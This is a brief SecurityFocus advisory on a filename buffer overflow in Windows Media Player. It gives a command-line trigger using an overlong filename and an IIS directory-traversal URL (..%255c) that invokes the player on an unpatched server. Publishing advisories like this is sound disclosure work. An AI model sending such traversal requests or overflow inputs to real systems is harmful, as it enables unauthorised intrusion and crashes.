Microsoft Windows Media Player Filename Buffer Overflow Vulnerability

The following example was provided:

From the command prompt it is possible to reproduce this issue with this command:

mplay32.exe A<x279>.mp3

On an unpatched IIS server it is possibly to invoke the application with the following request:

http://target/scripts/..%255c..%255cwinnt/system32.exe?/A<x279>.mp3

Currently we are not aware of any exploits for this issue. If you feel we are in error or are aware of more recent information, please mail us at: vuldb@securityfocus.com <mailto:vuldb@securityfocus.com>.


 

Privacy Statement
Copyright 2010, SecurityFocus